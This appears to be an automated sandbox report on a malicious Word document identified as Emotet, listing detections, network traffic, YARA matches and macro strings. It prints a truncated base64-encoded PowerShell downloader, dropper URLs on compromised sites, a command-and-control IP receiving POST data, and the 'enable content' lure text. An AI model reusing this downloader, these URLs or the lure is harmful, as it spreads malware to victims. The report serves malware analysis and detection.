JwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://veterinariadrpopui.com/content/5f18Q/Avira URL Cloud: Label: malware
                    Source: http://khanhhoahomnay.net/wordpress/CGMC/Avira URL Cloud: Label: malware
                    Source: http://shop.elemenslide.com/wp-content/n/Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: DATA-480841.docVirustotal: Detection: 59%Perma Link
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,7_2_100021F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,7_2_10002730
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002175AE CryptDecodeObjectEx,15_2_002175AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021109C FindFirstFileW,15_2_0021109C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: global trafficDNS query: name: wpsapk.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

                    Networking:

                    barindex
                    Potential dropper URLs found in powershell memoryShow sources
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://wpsapk.com/wp-admin/v/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://veterinariadrpopui.com/content/5f18Q/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://shop.elemenslide.com/wp-content/n/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                    Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 209.59.139.39 209.59.139.39
                    Source: Joe Sandbox ViewIP Address: 5.2.136.90 5.2.136.90
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: POST /6tycsc/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6tycsc/Content-Type: multipart/form-data; boundary=----------OGLPvif2cEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0022023A InternetReadFile,15_2_0022023A
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: unknownDNS traffic detected: queries for: wpsapk.com
                    Source: unknownHTTP traffic detected: POST /6tycsc/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6tycsc/Content-Type: multipart/form-data; boundary=----------OGLPvif2cEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                    Source: powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                    Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com/wp-content/n/
                    Source: powershell.exe, 00000005.00000002.2117671209.0000000003B34000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
                    Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                    Source: powershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com
                    Source: powershell.exe, 00000005.00000002.2122315304.000000001B916000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com/wp-admin/v/
                    Source: powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                    Source: rundll32.exe, 00000008.00000002.2112048540.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                    Source: powershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
                    Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                    Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
                    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
                    Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Document contains an embedded VBA macro with suspicious stringsShow sources
                    Source: DATA-480841.docOLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                    Source: DATA-480841.docOLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                    Source: DATA-480841.docOLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                    Source: DATA-480841.docOLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                    Source: DATA-480841.docOLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                    Source: DATA-480841.docOLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                    Source: DATA-480841.docOLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                    Source: DATA-480841.docOLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                    Source: DATA-480841.docOLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                    Source: DATA-480841.docOLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                    Source: DATA-480841.docOLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                    Source: DATA-480841.docOLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                    Source: DATA-480841.docOLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                    Source: DATA-480841.docOLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                    Source: DATA-480841.docOLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                    Source: DATA-480841.docOLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                    Source: DATA-480841.docOLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                    Source: DATA-480841.docOLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")Name: Jlda77h_v8nx5
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")Name: Jlda77h_v8nx5
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")Name: Jlda77h_v8nx5
